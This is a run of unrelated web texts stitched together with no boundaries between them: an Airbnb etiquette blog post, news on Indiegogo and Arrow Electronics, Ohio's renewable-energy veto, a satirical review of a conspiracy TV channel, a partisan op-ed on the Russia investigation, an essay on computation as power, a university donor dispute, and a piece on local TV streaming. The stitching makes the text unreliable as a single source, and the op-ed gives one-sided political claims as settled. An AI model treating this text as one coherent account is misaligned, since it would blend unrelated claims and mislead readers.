Airbnb check out etiquette is not usually a big deal and can actually be better than a hotel 's policy where you need to go to the front desk , which your Airbnb does n't have !
Do you have to do anything with the sheets at an Airbnb ?
Generally no , but occasionally a host might want you to strip the sheets right before leaving an Airbnb . They should tell you this explicitly in the manual or word of mouth . If they do n't , assume you do n't have to .
Do you have to wash my dishes at an Airbnb ?
Generally yes , but most Airbnbs I 've stayed at have a dishwasher so I 've put my dishes in the dishwasher and let the host run it after I left .
Do you tip Airbnb ?
This is simple ! You do not need to leave a tip at your Airbnb . Of course , if your host went above and beyond , you could leave one if you really wanted to , but you do n't have to .
Do you need to pack anything special for an Airbnb ?
Read the listing and manual ( if the host gives it to you ) before you go to the Airbnb . I 've never had to pack anything extra for an Airbnb , but at the next Airbnb I 'm going to , they have an additional charge for sheets . Since I 'm going to be driving there , I 'm going to pack my own sheets to avoid the charge . This is a rare occurrence .
At one mediocre Airbnb I stayed at , there was no shampoo , but I only went for a night so it did n't matter . You might want to check if your host provides basics that you would get in a hotel , but most likely you do get the same toiletries as a hotel and sometimes more !
If you think you can handle Airbnb etiquette and want to try out this cool way of traveling , get $ 20 off your first Airbnb with my referral code !
To learn more about an Airbnb vs. hotel , check out this post on what Airbnb is and why it 's better than a hotel . Also , Passport & Plate can help you pick the perfect Airbnb .
Thanks for stopping by ! xo .
Come say hi to me on Instagram !
I 'd love to know if you made it this far down into the post . It 'd actually make me quite happy if you reached out on Instagram and said hello !
Most Commonly Used Travel Items
If you liked my travel tips above , then you may like these other items I always travel around Europe with .
Sneakers That Match Almost Everything & Look So Fresh in NYC Sneakers That Match Almost Everything & Look So Fresh in NYC
Dual-voltage Hair Straightener ( Read More )
Charging Station to Charge Everything at Once
Lightweight But Kicka $ $ Camera Lightweight But Kicka $ $ Camera
Mini Portable Charger I 've Had Since 2015 Mini Portable Charger I 've Had Since 2015
Daypack ‘ Cause I 'm Not a Fan of Purses Daypack ‘ Cause I 'm Not a Fan of Purses
Reusable , Foldable Bag ( See 8 Reasons Why Here )
Something Cute But Easy to Pack Something Cute But Easy to Pack
Indiegogo is partnering with Arrow Electronics in a move to expedite product development from crowdfunding through to market launch .
Founded in 1935 , Arrow is a global provider of electronics components and related services . Now , in addition to serving as a key supply-chain company for thousands of manufacturers , it will also serve as the default support and engineering assistant for entrepreneurs seeking an easier path to market .
Aimed squarely at technology and Internet of Things ( IoT ) crowdfunders , the new strategic alliance will see Arrow integrate its design and production platform directly into Indiegogo 's crowdfunding engine , giving users a direct channel to a myriad of design tools , prototyping wares , experts , and supply chain management . Not everyone will qualify , however ; Arrow gets the final say on which campaigns it feels are suitable from a technical and manufacturing perspective .
“ This is a completely new model of social funding , innovation , and production in the technology and IoT space , ” said Matt Anderson , Arrow 's chief digital officer . “ Crowdfunding has never before been integrated into a fully scaled innovation platform like this — that spans collaborative online design , prototype support , production , and supply chain management . The Arrow-Indiegogo collaboration will enable successfully crowdfunded companies to scale faster than ever before to bring their products to market . ”
Today 's news comes five months after Indiegogo announced that cofounder Slava Rubin was stepping aside as CEO to be replaced by David Mandelbrot , the company 's former chief operating officer . This move was then followed by a round of layoffs . “ We restructured teams to focus on areas of investment for 2016 , including our marketplace business , enterprise crowdfunding , China , and other areas focused on empowering entrepreneurs , ” the company told VentureBeat at the time . “ Adjusting teams is something that we have done periodically to free up resources for new initiatives and to invest in growth . ”
Indiegogo has launched a number of new initiatives of late , all designed to create key differentiators between itself and high-profile crowdfunding rival Kickstarter . Back in January , it launched a new enterprise crowdfunding program , which landed shortly after the rollout of a new standalone platform for nonprofits and social causes . And , in March , it partnered with Dell and Girls in Tech to support female entrepreneurs .
The latest partnership will provide discounts to Indiegogo creators on materials and design software , as well as access to engineers through Arrow 's live-video platform . Indiegogo says that the alliance came about after the company noticed Indiegogo creators were increasingly using Arrow 's services . “ We 've seen an incredible amount of growth among tech and IoT projects on Indiegogo , due , in part , because our team is constantly developing new ways to help entrepreneurs with support beyond funding , ” said Mandelbrot .
Wind power , old and new , west of Bowling Green . A new bill would freeze at current levels the amount of wind energy Ohio utilities must use . ( Photo : ASSOCIATED PRESS )
In a victory for clean energy advocates , Gov . John Kasich Tuesday again broke with fellow Ohio Republicans , vetoing their attempt to put a halt to the state 's requirements that utility companies get more and more energy from renewable sources .
Kasich had already vetoed Republican lawmakers ' attempt to limit abortions in Ohio to the first six weeks of gestation , a measure he said would be struck down by federal courts .
The veto set off a barrage of press releases . Environmental groups cheered the news . But others - including statehouse Republicans who had passed the bill - were n't so happy .
State Sen. Bill Seitz , a Green Township Republican , said the veto `` disrespects '' the legislative process , adding : `` It is apparent that Governor Kasich cares more about appeasing his coastal elite friends in the renewable energy business than he does about the millions of Ohioans who decisively rejected this ideology when they voted for President-elect ( Donald ) Trump . We can only hope that President Trump and his amazing cabinet of free market capitalists will save us from the regulatory overreach of Al Gore-style policies that take unnecessary money out of ratepayers ' pockets . ''
But the Environmental Defense Fund said the veto will allow Ohio to become a leader in the clean energy economy , `` clearing the way for well-paying jobs , millions in investment , and healthier air for all . ''
Supporters of the mandates say they 're necessary to decrease air pollution and reduce the state 's reliance on coal and natural gas . Proponents also argue Ohio is far behind other states in attracting companies in the clean energy sector .
`` Businesses need certainty to invest , '' said Andy Holzhauser , founder and former CEO of the Greater Cincinnati Energy Alliance .
The freeze and the back and forth about whether to lift it `` create uncertainty , and thus you stunt private sector investment , '' Holzhauser said . `` The vast majority of Ohioans support clean energy and want more of it . ''
With this veto , a freeze on the standards lifts after Dec. 31 , and Ohio 's clean energy mandates will be in motion once again .
Kasich himself said in a statement that keeping the standards will help Ohio 's economy . `` Arbitrarily limiting Ohio 's energy generation options amount to self-inflicted damage to both our state 's near- and long-term economic competitiveness , '' he said .
NEWSLETTERS Get the News Alerts newsletter delivered to your inbox We 're sorry , but something went wrong Be the first to be informed of important news as it happens in Greater Cincinnati . Please try again soon , or contact Customer Service at 1-800-876-4500 . Delivery : Varies Invalid email address Thank you ! You 're almost signed up for News Alerts Keep an eye out for an email to confirm your newsletter registration . More newsletters
Lawmakers could take up the issue again next year , or they could reconvene later this week to vote to override Kasich 's veto . House Speaker Cliff Rosenberger , R-Clarksville , issued a statement late Tuesday indicating that was unlikely . Saying he was `` disappointed '' in the vetoes , he said the energy bill ( and others vetoed by Kasich Tuesday ) would continue to be House GOP priorities - but in the next session of the General Assembly , starting in January .
For now , all electric utility companies will be required to meet the 2017 benchmarks , including getting at least 3.5 percent of the electricity they sell from renewable energy sources , such as wind , solar , water or geothermal .
Under the law , utilities can build their own renewable sources or buy renewable energy credits .
The percentage of renewable electricity would increase to 12.5 percent by 2027 . The failure to meet that standard would result in fines .
Officials at Duke Energy , Southwest Ohio 's distributor of electricity , reported buying 2.4 percent of its electricity with renewable energy credits in 2015 . The company would have preferred an incentives program over mandates but `` will comply with it as cost-effectively as possible , '' said company spokesperson Sally Thelen .
How did we get here ?
Ohio 's clean energy standards have changed dramatically since a Republican-led House and Senate first passed them in 2008 .
The first iteration set a goal for electric companies to achieve `` 25 by 25 , '' meaning that 25 percent of the electricity sold to Ohio customers was to be created by alternative energies by 2025 .
Essentially , that meant more electricity produced by wind , solar , water and geothermal sources and less from fossil fuels , such as coal and natural gas .
The mandate started off at 0.25 percent in 2009 , and was set to gradually rise , year over year .
The law had other requirements , including increases in energy efficiency over time to cut back on the power Ohioans use and a mandate to give customers a choice in their electric supplier .
The mandates were in effect for about five years , putting Ohio 's renewable energy use at about 2 percent , according to the U.S. Energy Information Administration .
That 's when Republicans voted to lower the final standard to 12.5 percent and extend the deadline to 2027 , before voting in 2014 to freeze the standards altogether for two years , in order to study what the state should do .
`` The assumptions at the time seemed valid , but , in hindsight , proves only how bad the government is at trying to central-plan large portions of the economy , '' said Sen. Bill Seitz , R-Green Township , in an October interview with the Enquirer .
Reaction to Gov . Kasich 's veto of House Bill 554
Union of Concerned Scientists : “ Governor Kasich showed real leadership today . By vetoing House Bill 554 , he has sent a strong message to the clean energy market that Ohio is serious about creating jobs and spurring investment in that industry . ''
Christian Coalition of Ohio : `` We are grateful for Governor Kasich 's leadership on the issue of energy reform ... We want Ohio to lead the nation in energy production to provide jobs for our families , savings for our churches , and safety for our children through American energy independence . ”
The Buckeye Institute : `` It is unfortunate that politics got in the way of the right policy for Ohio ... While we at Buckeye ultimately want an outright elimination of these burdensome energy mandates that are of dubious environmental value at best , the legislature 's modest reform is better than nothing . Perhaps the best Christmas gift of all would be to trade in the lump of coal Kasich 's veto of this legislation offered Ohioans and instead have jobs for coal miners as well as cheaper ( and locally-produced ) energy for Ohio families and businesses . ''
Audubon Society : “ Conservative politics and profitable clean energy go hand-in-hand . Governor Kasich gets it and Ohioans owe him a big thanks , ”
More politics :
CLOSE As Gov . Chris Christie 's approval rating hits the floor , some of his closest aides still think he has a chance in the political arena . Video provided by Newsy Newslook
Correction : An earlier version of this story incorrectly stated Andy Holzhauser 's position with the Greater Cincinnati Energy Alliance .
Read or Share this story : http : //cin.ci/2hqFSHv
Ask anyone with a Sky box : the problem with the multi-channel universe is how samey it all is . Hundreds of stations pumping out the same palliative mulch .
But every so often a new start-up channel emerges with a leftfield agenda . It 's always worth tuning in once , just for the surprise value . There was Isle Of Wight TV , which seems to have vanished now . And SoundTV , which consisted of old-school variety and interviews with Richard Digance . That 's gone too . These rogue stations do n't tend to last long .
Well here 's a new one : Edge Media TV ( Sky Channel 200 ) , `` a platform for alternative and suppressed viewpoints '' . In other words , it 's chock-full of conspiracy theories . Conspiracy theorists need to believe their viewpoints are being suppressed , rather than , say , assessed and dismissed as ropey and ludicrous . Which makes a channel devoted to spreading these viewpoints a bit of a paradox . If `` the system '' was even 1 % as efficient and sinister as they believe , their station would n't exist .
But it does , broadcasting programmes with titles like Question Everything and Hidden Agenda , and a talkshow called Esoteria , which according to the host is `` a SHOW , not a PROGRAMME - we aim to SHOW you alternative viewpoints rather than PROGRAM you to accept a particular point of view '' . He must be proud of that bit of mind-expanding wordplay because he repeats it quite a lot . A bit like he 's programming you , actually .
And herein lies the tragedy . The other day I tuned in to Eerie Investigations , in which the host , a strangely simpering woman with Eerie Investigations printed on her T-shirt , conducted vox-pop interviews with people at an anti-ID card rally . There are a thousand valid reasons for opposing ID cards and questioning everything the government does , but instead both the host and her interviewees spent most of their time talking about how we 're all going to have microchips planted in our heads as part of the New World Order ( which , naturally , orchestrated the 9/11 attacks ) , intermittently breaking from this theme to dismiss the general public as idiotic , docile sheep with such towering self-assurance it made you actively wonder whether labouring under a fascist police state in which government computers monitored your dreams and doled out electric shocks each time you had a subversive thought would be preferable to living in freedom alongside these massive wankers .
Maybe `` wankers '' is a bit harsh . These are essentially clever people gone wrong . Having learned to mistrust the powers that be , they take a giant leap , mistaking bossiness and incompetence for ultra-organised and sinister plotting - and then compound the error by mistaking themselves for journalists or scientists . The result is a depressing descent into fairytales backed with risible `` evidence '' ; fairytales told with the defensive assertion that anyone who does n't believe them is a shill or a sheep .
Consider Ludicrous Diversion , an Edge Media documentary which implies the 7/7 bombers were n't really bombers at all , but patsies framed by `` the system '' . Rather than offering any hard evidence for this startling claim , it highlights minor anomalies in the official version of events , the police 's reluctance to release CCTV footage , and references to past miscarriages of justice such as the Guildford Four , then expects the viewer to add two and two to make 25 . It 's like a lazy and badly made Power Of Nightmares , convincing only to the eagerly paranoid .
In-between the programmes , there are adverts for Cillit Bang ( whose exact role in the New World Order has yet to be established ) and a seven-hour - yes , SEVEN Hours - `` DVD presentation '' from David Icke , in which he tells the viewer how the world really works . And presumably apologises for not employing an editor .
In summary : it 's bunkum . But then I would say that , would n't I ? I 'm a mainstream media shill . They 've got to me already . And now they 're coming for YOU .
By Robert Romano
So , wait , the whole supposed Russian collusion effort with the Trump campaign had nothing to do with the Democratic National Committee ( DNC ) or John Podesta emails or Wikileaks at all , but actually centered on a June 2016 meeting with Donald Trump , Jr. and a Russian attorney over supposed dirt she had on Hillary Clinton about her dealings with Russia ?
And then the attorney used the meeting as an opportunity to instead talk about U.S. sanctions against 18 Russian individuals and Russia blocking U.S. adoption of Russian children in response ?
That 's the collusion ? The conspiracy ? The treason ?
Trump , Jr. trying to obtain dirt on Clinton 's alleged wrongdoings in Russia in the middle of the his father 's 2016 election campaign from a Russian source supposedly in a place to know — but not finding any — and inadvertently stumbling into a conversation about U.S. sanctions and Russian policy affecting child adoptions out of that country ? Is this a joke ?
This is all a far cry from the original allegations that were leveled at President Donald Trump — that Russia had hacked the DNC and Podesta emails , had them published on Wikileaks , and that the Trump campaign had assisted in those efforts .
Those still unproven charges , from third-party sources Crowdstrike , Fusion GPS and former British spy Chistopher Steele ( whose falsehoods are now the subject of a defamation lawsuit in the UK ) apparently formed the basis of the now year-long investigation by the federal government into these matters .
Charges that so far as we know to date based on publicly available information were never corroborated . Crowdstrike co-founder Dmitri Alperovitch said from the get-go in June 2016 that “ [ W ] e do n't have hard evidence ” of how somebody had gotten into the DNC emails and the FBI never checked the servers . Steele for his part later admitted in April that the claims in his sensational dossier were unverified and were never even supposed to be published .
So the Steele dossier was a bust . And Crowdstrike admitted up front there was no proof Russia was behind the DNC emails .
And now the most charitable explanation observers can come up with , but which may still miss the mark , is that the Russian government might have fed this information to Steele and the Democrat donors who funded him , in an attempt to deceive everybody — to attempt to show collusion when there was none .
Except , then , why was the FBI reportedly offering to pay Steele to continue his work — if they thought his intelligence was all a hoax ?
The only scandal here is that anybody in the federal government took this witch hunt seriously in the first place and that we 're all still talking about this nonsense . This is a major embarrassment for the U.S. national security apparatus . A disgrace . The Russia story has become a parody of itself . Tens of billions of dollars spent every year on intelligence , and we 're chasing phantoms and investigating presidential campaigns using unverified garbage — calling into doubt the impending Congressional reauthorization of Section 702 of the Foreign Intelligence Surveillance Act .
Now , what we are left with are claims that still purport to prove the President is a Russian agent and a traitor . Instead , they simply show that persons in Trump 's orbit did have contacts with Russians , yes , but which do not at all substantiate the original charges on hacking or coordinating to put Democrat emails onto Wikileaks .
In this case , Trump 's son , who met somebody from Russia to discuss campaign opposition research but did n't actually receive any that morphed into a meeting about adopted children .
Or that Jared Kushner proposed a backchannel with Russia after the election — note , not months prior during the campaign as had originally been alleged by Steele — to discuss relations between the two countries . Or that former National Security Advisor Michael Flynn spoke with the Russian ambassador Sergey Kislyak about U.S. sanctions against that country during the transition , again after the election . Or that Attorney General Jeff Sessions met with Kislyak as a part of his official duties as a U.S . Senator . And on and on .
These latter stories largely came after there was nothing in the original allegations that could be proven . To attempt to show collusion on the campaign where there was none .
So what ? There were contacts . Were there any crimes committed , or what ? Any proof the Trump campaign helped Russia hack the DNC and Podesta emails and put them on Wikileaks ?
Or was this all just a vast Russian conspiracy to lift sanctions on 18 individuals and to revisit Russia 's policy against U.S. adoptions of Russian children ?
Robert Romano is the Vice President of Public Policy of Americans for Limited Government .
The most important paradigm of power in the world today is computation .
For a long time we have heard that computers are going to revolutionize every aspect of our lives , but only recently in seeing the accelerating speed with which the personal computer , the internet , and the smartphone have revolutionized our lives have the majority of people come to see the rising tide of technological change .
Nonetheless , even as peck away at magical little devices in the palms of our hands , even as we feel the water around our feet we still think we are safe on dry land . We stare out at a rising ocean of possibility , yet we need to believe that our world is solid , that it is more or less the same as it has always been . Computers are neat , but ultimately old paradigms of power like military strength , business , politics , and money still rule the world , right ?
The ability to perform computation has become the most important nexus of power in the 21st century . In the same way that power in earlier centuries was determined by who had control of key natural resources like gold or oil , power in the 21st century will be determined by whoever has the best access to computation and the accouterments that enable it , such as networking . In the modern age it is he who wields the most computation who will have the competitive edge , in war , in business , and in politics .
Put simply , computation is power .
Envisioning what a full-scale war effort between fully modernized states might look like provides the perfect example to consider the importance of computation .
Imagine the economic damage that could be done by interrupting the ability of an enemy to send money electronically from one place to another , or if you were to shut down enemy telecommunications networks . Digital attacks could be used against key infrastructure , such as electrical generating facilities or specific factories which are producing weapons . Even if these facilities are not directly connected to the internet , they could be vulnerable to more creative kinds of attacks ( see the Stuxnet virus which traveled on USB drives to access Iranian nuclear production facilities in 2010 ) .
Ultimately the question of how devastating a cyberattack could be on a modern nation can be answered with a specific question : How devastating would an extended interruption of internet communications be to you ? How well would you cope if you had no access to your smart phone , email , or computer for a couple of days ? a week ? a month ?
Clearly , cyber warfare is a combat space which suddenly just is as important as the land , air , or sea but the ability to wage such warfare in this day and age is really more about the talent of hackers involved in your cyber warfare program than about raw computation . So , we must go deeper to answer the question as to how raw computation could translate into military power .
The most obvious answer here is that raw computation opens up avenues for code-breaking that would enable more advanced forms of cyber warfare . In addition to this though , there are more exotic possibilities which could be opened up by the application of big data and massive computation leveraged against an enemy state . If you can understand your enemy better , you can predict what your enemy is likely to do .
For instance , you could analyze based on satellite data how much activity is happening at various resource collection sites and factories and estimate what kind of weapons systems your enemy is increasing production of . Similar big data analytics could tell you how happy the populace is based on how busy their cities are , how much food supplies they have , or any number of other metrics which give important insight to the operation of an enemy economy .
Big data and big computation could also be leveraged in more subtle ways against an enemy . The use of algorithmic propaganda to massage the public mood and political support for the war could be a real game changer . Using algorithms to massage the flow of information from news sites to various to individuals could be used a moment uprisings in one part of a country or depressing people 's interest in the war in other parts .
Known as micro-targeting , this kind of highly targeted campaigning has been used to push individuals in one direction or the other during political campaigns . At this point the technique of micro-targeting is still in its infancy , but as big data and big computation starts to come to bear in the micro-targeting industry this could start to represent a real super-weapon of sorts . Whether used on an enemy nation or on the people at home , an algorithm which can understand how to subtly manipulate people 's political views will offer unprecedented power for those who can control it .
In the world of business , computational power is already providing the same kinds of advantages that it will in war or in politics . Ask any salesman , and they will tell you that it is just as important to understand your customer as it is to understand your product . You can sell anything to someone who you understand . With the reams of data which we pump into Google and Facebook every day , the companies which can turn data into successful sales models are already the ones reaping the profits , and this trend will only continue on into the future .
Just as in war , businesses might also bring computational power to bear against enemy corporations . For instance , a company which has access to the information necessary to predict the who might be the most effective employees in a rival company could orchestrate a campaign of employee poaching aimed specifically at disruption of their rival . They could also attempt to interrupt supply chains , or devise a counter-marketing strategy to specifically target individuals likely to purchase from their competitor .
The fact is that it is not difficult to conjure up countless ways in which big data can combine with powerful computation to produce new strategies in any discipline or field . Computation means power in the 21st century because it is through computation that we can better understand the world . It could be argued that computation has always been the dominant paradigm of power since the emergence of higher animals . The ability to recognize patterns and make somewhat accurate predictions about what is going to happen in a given situation is what gave rise to increasing brain size . It 's been survival of the smartest since the very beginning .
In today 's world , as machine learning advances in leaps and bounds and big data pours out like an open tap , it is those with the best computers who will best understand the world… and control it .
Advertisements
A battle involving money and politics , academic freedom and threatening emails has hit an Israeli university after one of its academics took part in a Channel 4 documentary which has been accused of encouraging antisemitism .
At the centre of the dispute is Michael Gross , a prominent member of Britain 's Jewish community , a long-time donor to Ben-Gurion University ( BGU ) and a member of its international board of governors .
After seeing the Dispatches programme last month , Gross emailed Professor David Newman – a British-born lecturer who has emigrated to Israel – and wrote : `` I saw your disgusting contribution to the Dispatches programme . I will use whatever influence I have at BGU to have you thrown out… I hope you perish . '' In a second message , he said : `` The sooner you are removed from BGU and the face of the earth , the better . ''
The programme , presented by the British journalist Peter Oborne , was billed as the inside story of `` Britain 's Israel lobby '' , which the broadcaster 's blurb described as `` little known '' but `` wielding great influence among the highest realms of British politics and media '' . In fact , it acknowledged that the membership of groups such as Conservative Friends of Israel and Labour Friends of Israel was well known . But Jewish community leaders were angered by the programme 's tone and that almost all of those interviewed were sharply critical of Israel .
Last week , 120 BGU faculty members attacked Gross 's email . In a letter to Roy Zuckerberg , the chair of governors , a US philanthropist and former Goldman Sachs partner , they said Gross 's `` hate mail '' was a challenge not only to Newman but also to academic discourse and free speech . Saying that Gross should have `` no place in the BGU community '' , they urged Zuckerberg to demand that Gross apologise or sack him from the board . One academic said yesterday that he had signed the letter not only to support Newman , but because there was growing political pressure on many left-of-centre academics both from within Israel and major diaspora communities .
Gross told the Observer that he regretted `` the language , but not the sentiments '' in his attack on Newman . `` I was furious . It was intemperate . ''
He said that his threat to try to get Newman fired was `` because I wanted to upset the guy . I wanted him to be as upset as I was . '' But he added : `` I am not going to apologise to him , because he deserves what he gets . ''
Gross said he had `` exploded '' because of the fundraising implications for the university of one of its lecturers appearing on an `` anti-Israel '' programme . `` We 're trying to mount a campaign to increase support for the university , and a guy like that just walks us back five years , '' he said .
Gross qualified as an accountant in London , but went on to get a Harvard Business School degree and returned to Britain build up a successful property business in the 1980s . In Jewish community life , he became an often outspoken participant in debates on the religious direction and leadership of the community , as well as an advocate of strong support for Israel . In recent years , he has spent most of his time in Israel .
Newman revealed that he had lodged an official complaint against Gross with the Community Security Trust ( CST ) , the body that monitors threats against British Jews . `` If someone had written to any member of the Anglo-Jewish community with words like that , it would immediately have been reported to the police , and they would have wanted to know why it was n't being dealt with , '' he said .
The academics say the issue is academic freedom . Gross 's emails , their letter said , `` signal an attitude of total disdain for the principles of academic discourse based on open debate , and for free inquiry of any kind '' .
One of Gross 's fellow governors said yesterday that Rivka Carmi , the university 's president , would be `` caught between a rock and a hard place '' . `` She has to keep the faculty happy , '' adding that in BGU and other Israeli universities there was no prospect of a professor getting sacked over political views . `` On the other hand , she has to keep her supporters happy to give money to the university . ''
Another governor , British lawyer Harold Paisner , said the tone of Gross 's emails was unacceptable . `` It is one thing having a difference of opinion . But because you disagree with someone 's political views , to wish them dead and curse them – this is appalling . I am horrified . ''
In his appearance on the programme , Newman , a political geographer who is editor of the international Journal of Geopolitics , did not directly criticise Israeli policy . In fact , after seeing the programme , he said he regretted having taken part . In a column for the Jerusalem Post several days after its broadcast , he said that the programme had been very one-sided .
Israeli universities increasingly rely on support from overseas donors . But diaspora leaders , particularly in Britain , feel they are facing an increasingly anti-Israel and antisemitic tone in politics and the media , causing tension with left-of-centre voices in Israeli faculties .
Live local streaming is a dream deferred by complex licensing deals . But the urgency to finally make it happen has never been greater .
If broadcast affiliates had their way , they would be just like Netflix , only better . Via direct-to-consumer over-the-top offerings , they would beam their station signals far and wide , just like they do on regular TV—live , linear and , most enticing of all , free .
“ We want to provide all our programming—our locally produced programming , our networking programming and our syndicated programming—to our consumers , who want to see that programming on any device whatsoever , ” says Jeff Rosser , a Raycom Media VP who chairs the Fox Affiliates Board . “ That 's what our customers want , and we want to be responsive to what they desire. ” The data trends back him up—59 % of pay-TV homes in the U.S. also have a subscription to Netflix , Amazon or Hulu , a Leichtman Research Group study found in July , up from 47 % in 2014 . In cord-free homes , the number jumps to 70 % .
Consumers ' hunger to get TV content in ways beyond the traditional bundle is now an absolute . Sating that hunger , for affiliates , has proven to be a mind-bendingly complicated task . Against a backdrop of restless experimentation—networks launching stand-alone OTTs , skinny bundles proliferating , and consumers enjoying a Las Vegasstyle buffet of choices—affiliates ' plans to light up live local TV on their own digital platforms remain stymied . Technology is no longer an obstacle—instead , the holdup is simple economics , operational mechanics and industry politics .
About two-and-a-half years since the idea of putting free TV over-the-top first hatched , TV stations and the networks whose programming they air are still hashing out issues from distribution rights and business models to who should be in charge of bringing the idea to fruition . That last point is perhaps the biggest impediment of all . “ The networks are trying to control negotiations with OTT , ” says Preston Padden , a media consultant and former top Disney and Fox executive . “ This can be a cause of tension between the networks and affiliates and a cause of frustration for new OTT players who want to pay for rights but are caught in the crossfire between networks and affiliates . ”
Hovering over the epic push and pull of negotiations is the stark reality that nobody really knows what is at stake with OTT—or how it 's going to morph and grow . Stakeholders engaged in the talks are playing an elaborate game of Texas Hold 'Em , hoping to see the cards they want when the dealer flips them over .
Given how admirably many station groups have performed in recent years despite considerable headwinds , and the function they serve in communities faced with the retreat of newspapers , it 's entirely possible that going OTT could be the ultimate energy shot . Mindful of this success scenario , networks and local broadcasters each want to make sure any agreement they reach positions them for a big payoff .
Ramping Up
For all of the fascination with OTT as an idea , the actual audience consuming it is very modest in size , at least for stations . Whereas broadcast TV is delivered to roughly 99.44 million pay-TV households , according to the latest figures from Nielsen , industry sources estimate that viewership via alternative digital means adds up to maybe 1 % of that , at most .
“ The biggest stumbling block is that this is all new for everyone , ” says Graham Media president and CEO Emily Barr , who chairs the ABC Affiliates Board . “ When you go into negotiating these days , you are a bit blind because you do n't know what is going to be . For that reason , everyone is treading carefully .
“ It is not a speedy process , ” she says .
Owned-and-operated stations , as vertically aligned assets of the broadcast networks , are immune from most of the issues and have been able to be featured in some digital offerings like CBS All-Access or Watch ABC . But many of the 800-plus ABC , CBS , Fox and NBC affiliates consider having control of the process as the only way OTT will ever actually happen .
Station groups want to drive their own carriage deals with digital platforms ( Roku , Google Chromecast , Microsoft Xbox , etc . ) , much in the same way they have done with multichannel video programming distributors ( MVPDs ) since the early '90s . Under that model , station groups are the hands-on negotiators with cable and satellite services , working on behalf of their affiliates as well as the networks .
In exchange for selling their signals to subscribers , MVPDs pay local broadcasters a portion of that money in the form of retransmission consent fees . Station groups , in turn , fork over a cut of that cash—roughly 50 % —to the networks as part of their affiliate agreements .
Because OTT distributors are not considered MVPDs ( the FCC has yet to legally categorize them as such ) , ABC , CBS , Fox and NBC see the emergence of OTT as their chance to control what they ca n't in the MVPD world . And there could be big money at stake in that battle for control .
Early ventures indicate that networks favor the idea of offering live local feeds as part of subscriptions , skinny bundles or network-driven offerings like CBS All Access , a subscription video-on-demand service costing $ 5.99 a month . That , however , does n't match the goal of many affiliates , which at this early stage are less concerned with getting a payout than getting their signals in front of , say , that Apple TV fan in Rockford , Ill. , or a Seattle gamer more likely to flip on an Xbox than TV set .
That 's also what differentiates affiliates ' plans from TV Everywhere initiatives launched by pay-TV services as well as each of the networks , which offer live local to consumers who have to authenticate their MVPD subscriptions before tuning in . Watch ABC , an ambitious digital offering that features programming from many Hearst stations alongside Scandal and Shark Tank , can only be viewed by pay-TV subscribers .
CBS has made the most headway in this arena , striking agreements that give affiliates the option of offering their live signals to Sony PlayStation Vue subscribers as well as via CBS All Access . ( Though in the latter , it took a lot of cajoling of stations over the course of many months . )
Under CBS ' agreement with Vue , which has wanted to offer live local from the get-go , affiliates can distribute their signal via the platform in exchange for a cut of the money CBS gets from Sony , according to CBS television networks distribution president Ray Hopkins . Sinclair , Raycom , Meredith and Gray-owned stations , which together cover roughly half the country when combined with the CBS O & Os , already have opted in , Hopkins says . CBS stations covering an additional 25 % of U.S. households are expected to roll out in 2017 , he says .
Affiliates also opt to make their linear feeds available via CBS All Access , the network 's subscription-based OTT service , which offers the network 's library on-demand and will debut originals , such as a new Star Trek series , in 2017 . The upside for affiliates , Hopkins says , is they retain all their own ad inventory in addition to “ the economic deal to share in the growth of CBS All Access. ” CBS now says close to 100 % of its affiliates are on board .
“ I think we 've established the model , ” Hopkins says . “ The discussion has already taken place between us and the CBS affiliates , and I think everyone is very clear this is how we are going to proceed together—and thus far it has been successful. ” Indeed , CBS Corp. CEO Leslie Moonves raised eyebrows on Wall Street when he announced in July that total subscriptions for Showtime 's stand-alone SVOD and CBS All Access had surpassed 2 million , evenly split between the two . He says he was “ confident ” the company would hit its target of 8 million OTT subscriptions by 2020 , which the company estimates will bring in $ 800 million in new revenue .
Morgan Murphy Media 's Chris Cornelius says the CBS Affiliates Board he chairs approved the OTT arrangement because , when it comes down to it , the board views it as basically fair .
“ But it 's not the end-all , it 's not the be-all and it is not necessarily a way the affiliate body would like to handle this , ” he says . “ Affiliates would prefer to negotiate our own deals like we do with traditional MVPDs , but we simply do n't have the rights , ” he says . Plus , he adds , “ there is no incentive ” for networks to give ground on the issue .
On-Demand vs . Fully Live
Despite the perceived upside of taking the lead in carriage deals , it is possible that the networks could be pushing for a system that may have some inherent flaws . Over the years , Fox and NBC both proposed assuming responsibility for negotiating with MVPDs , but the idea did n't fly because it turned out to be fraught .
Negotiating on behalf of 200-plus affiliates per network , and their myriad owners , would be exceedingly complex . In addition , network-negotiated carriage deals would n't necessarily cover broadcast groups ' other assets , like digital subchannels , that need distribution , too .
“ It 's more complex than just a network feed , ” says Jack Goodman , a Washington-based lawyer who represents broadcasters . “ And those problems might continue to exist in an OTT environment . We just do n't know yet . ”
None of which means local TV has been sitting out the great OTT land grab while they and other stakeholders across the industry try to figure all this stuff out . Quite the contrary , in fact . Over the last few years , local broadcasters , sensing the existential threat , have launched a wide range of over-the-top offerings featuring the content they produce . They have been able to aggressively pursue a multiplatform approach with the news , public affairs and other programming that they actually own .
Leveraging websites , station-branded apps and , most recently , Roku , TV stations are offering newscasts live and on-demand , crowdsourcing weather , and covering high school sports . They are producing digital-exclusive programs and podcasts , some of which have little to do with what they show on traditional air .
Looking for maximum exposure , station groups are also partnering with others , including the free news aggregator NewsOn . The app , which resulted from a lengthy quest to build a consortium of station groups , lets users watch local TV newscasts from around the country and several different groups regardless of their geographic location or subscription/pay-TV status .
Similarly , Sean McLaughlin , E.W . Scripps VP of news , believes local programming should be the focus of TV stations ' efforts—more of an on-demand model than a fully live , always-on stream . Accordingly , he says Scripps has no plans to venture into live linear streams anytime soon .
“ To just put a broadcast in that space is probably not maximizing the opportunity , ” says McLaughlin , adding he 'd “ be surprised ” if affiliates are even able to strike all the agreements—with syndicators , sports franchises and advertisers on top of the networks—necessary to make that happen the way they envision .
Instead , McLaughlin says he has been focusing Scripps ' digital efforts , including a recently launched suite of station-branded Roku channels , on “ getting our dominant brands in our local markets into that space . ”
Although the channels ' early offerings are somewhat basic—local newscasts live and on-demand , and a news wheel—they are garnering viewers , he says . Consumers spend an average of 18 to 25 minutes with the Scripps channels , McLaughlin says . “ We feel pretty encouraged by that . ”
Interestingly , that exact same notion of the potency of local content is also the centerpiece of affiliate leaders ' efforts to reach the OTT promised land . “ The local programming , particularly local news , has an incredible value and we want to bring that to the table , ” says Quincy Newspapers president and CEO Ralph Oakley , chairman of the NBC Affiliates Board . “ It 's a big part of what people want no matter what type of delivery . ”
Network execs across the industry feel likewise . “ ABC has made it clear to us that they want the local/national mix as part of the OTT ecosystem that they are looking to get into , ” says Barr , adding affiliates and the network are getting “ closer ” to resolving the issues .
